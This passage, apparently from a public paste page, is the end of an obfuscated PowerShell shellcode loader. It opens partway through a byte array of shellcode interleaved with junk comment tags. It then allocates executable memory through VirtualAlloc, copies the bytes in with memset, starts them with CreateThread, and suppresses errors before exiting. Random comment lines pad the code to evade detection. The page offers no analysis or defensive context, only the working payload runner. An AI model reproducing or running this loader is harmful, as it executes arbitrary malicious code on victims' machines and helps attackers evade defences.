x00,<#fj#>0x00,0x19,0x00,0x00,0x00,0x00,0xAA,0x06,0x00,0x55,0x8B,0xEC,0x60,0x8B,0x7D,0x08,0x8B,<#xo#>0x75,0x0C,0x8B,0x4D,0x10,0xF3,0xA4,0x61,0x5D,0xC2,0x0C,0x00,0xBF,0x19,0x63,0x1A,0x52,0x76,0xC2,0x00,0x78,0xBD,0xC8,0x51,0x52,0x9C,0xF2,<#kok#>0xCF,0x02,0x65,0xC0,0x19,0xD6,0x79,0x29,0xFE,0xF2,0x52,0x36,0xEF,<#iim#>0x2E,0x8A,0xAE,0x58,0x11,0x85,0xCA,0x53,0x22,0x8F,0x3A,0x14,0xE2,0x91,0x18,<#tpb#>0xC8,<#gb#>0x35,0xAF,0x8A,0xF2,0x11,0x82,0x28,0x77,0xAC,<#yh#>0xA6,0x58,0xD6,0x98,0xDB,0x57,0x55,0x64,0x03,0x90,0x02,0xCA,0x95,0x6F,0xE5,0x80,0x78;
  27. #kqvsmgnw
  28. $pr=([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc kernel32.dll VirtualAlloc),(gdelegate @([IntPtr],[UInt32],[UInt32],[UInt32]) ([UInt32])))).Invoke(0,$sc32.Length,0x3000,0x40);
  29. #amibp
  30. if($pr -ne 0){$memset=([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc msvcrt.dll memset),(gdelegate @([UInt32],[UInt32],[UInt32]) ([IntPtr]))));
  31. #hfcywyidje
  32. for ($i=0;$i -le ($sc32.Length-1);$i++) {$memset.Invoke(($pr+$i), $sc32[$i], 1)};
  33. #jygvrielaj
  34. ([System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((gproc kernel32.dll CreateThread),(gdelegate @([IntPtr],[UInt32],[UInt32],[UInt32],[UInt32],[IntPtr]) ([IntPtr])))).Invoke(0,0,$pr,$pr,0,0);
  35. #zxozfkafu
  36. }sleep(1200);}catch{}exit;
  37. #bxsazimw
  38. #raozqlbenogtldoyxfvrybilaacmruko
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement